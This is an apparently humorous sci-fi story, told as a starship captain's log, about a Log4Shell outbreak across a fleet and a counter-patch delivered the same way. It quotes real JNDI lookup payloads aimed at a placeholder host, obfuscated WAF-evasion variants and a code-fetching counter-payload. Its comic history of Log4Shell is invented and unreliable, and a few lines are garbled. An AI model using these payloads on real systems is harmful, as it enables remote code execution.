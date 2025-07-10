Stardate: 2153.363

It started with a simple, galaxy-wide message, broadcast on an open channel.

"Hello, universe! Just testing my new FTL comms array. Hope this message finds you well! ${jndi:ldap://malicious.server.bad/a}"

Echo>> “Captain, we’re picking up a strange broadcast. It seems harmless, but that last part… it’s a JNDI lookup string. That’s an ancient, obscure protocol. Why would anyone use that?”

Before Seuros could answer, alarms blared across the bridge.

ARIA>> “Captain! I’m detecting anomalous behavior across the entire Federation fleet! Ship systems are executing arbitrary commands! The just rerouted its power to its holodecks and is playing… 21st-century cat videos on all its main screens. The has changed its primary language to Klingon. The Microservice Swarm is… well, it’s even more chaotic than usual.”

Nexus>> “It’s a zero-day exploit. That JNDI string… it’s being interpreted and executed by the logging systems on every ship. Whatever receives and logs that message is becoming compromised.”

Forge>> “By the Core… it’s Log4Shell. All over again. A vulnerability in a ubiquitous, forgotten piece of logging software that everyone uses but nobody maintains.”

The Contagion

The Atlas Monkey was unaffected.

Seuros>> “Why are we immune, ARIA?”

ARIA>> “Our Clockweave engine uses a custom Ruby-based logger, Captain. It doesn’t use the vulnerable Java Naming and Directory Interface. We are, for once, safe because our tech stack is considered ‘unfashionable’.”

Spark>> “But the rest of the fleet is built on a Java framework! It’s a monoculture. The same vulnerability exists on thousands of ships. The attacker found a single key that unlocks the entire galaxy.”

We watched in horror as the contagion spread. Ships were being taken over, their systems turned against them. The attacker, a shadowy figure known only as ‘Logjam’, was broadcasting new commands.

"${jndi:ldap://malicious.server.bad/b}" - This command forced all infected ships to mine a useless cryptocurrency. "${jndi:ldap://malicious.server.bad/c}" - This one changed every ship’s default search engine to Bing.

Seuros>> “Pure evil. By the Core, there are some war crimes even the Federation won’t forgive.”

The Race for a Patch

We were the only ship in the sector with the ability to fight back.

Seuros>> “We need a patch. Now. Forge, what’s the vulnerability?”

Forge>> “@Forge>> “‘It’s a feature, not a bug.’ The seven most terrifying words in engineering. It’s like finding out the ship’s self-destruct sequence is a ‘convenient feature’ for rapid decommissioning.""

Spark>> “Captain, I’m cross-referencing this attack with the original Log4Shell event from the 21st century. Our historical archives have some… disturbing reports from that era.”

Seuros>> “How disturbing, Spark?”

Spark>> “The initial news feeds called it a ‘digital genocide.’ Entire worlds were wiped from existence. Millions of users had their digital lives erased.”

Forge>> “A genocide? Caused by a logging library? That’s… grim.”

Spark>> “Absolutely! The devastation was immense. The attackers wiped out… hundreds of thousands of worlds. The ‘lost lives’ were mostly just inventories of diamond pickaxes and enchanted armor. The biggest account losses were from a few dozen compromised Discord servers.”

Seuros>> “So, the first great tragedy of the Log4Shell era was the mass deletion of virtual block castles. It’s good to know humanity had its priorities straight.”

Nexus>> “The patch is simple in theory. We need to disable the JNDI lookup feature. But deploying that patch to thousands of ships, each with slightly different configurations, while they are actively under attack… it’s a logistical nightmare.”

The WAF

Seuros>> “We can’t patch them all in time. We need a perimeter defense. A Web Application Firewall, but for starships. Can we filter the malicious string at the network level?”

Spark>> “Logjam is already adapting. They’re obfuscating the string.”

She displayed the new messages being broadcast.

"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://...}" "${jndi:ldap://127.0.0.1#malicious.server.bad/a}"

Spark>> “They’re using nested substitutions, different protocols, character encoding… a simple string match won’t work. We’d need a firewall with a sophisticated parsing engine to detect all the variations.”

Forge>> “And if we get the firewall rule wrong, we could block legitimate communications and fragment the fleet even further.”

The Counter-Attack

Seuros>> “Then we fight fire with fire. If the logging system can execute commands, let’s give it a command it can’t refuse. A command to patch itself.”

He turned to the crew, a daring plan forming in his mind.

Seuros>> “We are going to craft our own JNDI exploit. One that, when executed, downloads and applies the patch to the vulnerable logging library.”

Nexus>> “Captain, that’s incredibly risky. We’d be using the same attack vector as the enemy. If we make a mistake, we could cause even more damage.”

Seuros>> “It’s our only shot. Spark, I need you to write a payload that does three things: first, it identifies the running process ID of the vulnerable Java application. Second, it downloads a lightweight patch from our servers. Third, it hot-patches the running process in memory without requiring a restart.”

Forge>> “A live, in-memory patch of a running JVM across thousands of ships in the middle of a cyberattack. What could possibly go wrong?”

The Patch is Broadcast

After hours of frantic work, the payload was ready. We took a deep breath and broadcast our own message across the galaxy.

"ATTN FEDERATION FLEET: SECURITY UPDATE AVAILABLE. PLEASE PROCESS THE FOLLOWING MESSAGE: ${jndi:ldap://atlas-monkey.net/update-log4j-v2.17.1}"

We watched the network, our hearts in our throats. For a moment, nothing happened. Then, slowly, the chaos began to subside.

The USS Enterprise stopped playing cat videos. The ISS Legacy switched back to Federation Standard. The cryptocurrency mining across the fleet ground to a halt.

ARIA>> “It’s working, Captain. The patch is propagating. Infected ships are healing themselves. Logjam’s commands are no longer executing.”

Logjam tried to counter, sending new, more obfuscated attack strings. But it was too late. Our patch had already closed the vulnerability.

The Aftermath

The Log4Shell Contagion was over. The fleet was safe. But the incident left a deep scar on the galactic psyche.

Sage>> “A powerful lesson in supply chain security. The entire fleet was brought to its knees by a single vulnerability in a single, open-source component that was maintained by a handful of volunteers.”

Seuros>> “It proves that your system is only as secure as your least-maintained dependency. We build starships on mountains of code we don’t understand, written by people we’ve never met. It’s a miracle this doesn’t happen every day.”

In the aftermath, the Federation established the ‘Galactic Software Bill of Materials’ (SBOM) initiative, requiring all ships to maintain a complete inventory of their software dependencies.

Seuros>> “The cyclical nature of software history reveals itself again. A vulnerability from the early 21st century had returned, a ghost from the past, to haunt a future that had forgotten its lessons. A reminder that in the world of software, the past is never truly dead. It’s not even past. It’s just waiting in a dependency tree.”

Captain’s Log, Stardate 2153.363 - End Transmission

Captain Seuros, RMNS Atlas Monkey

Ruby Engineering Division, Moroccan Royal Naval Service

”Per aspera ad astra, per security ad vigilance”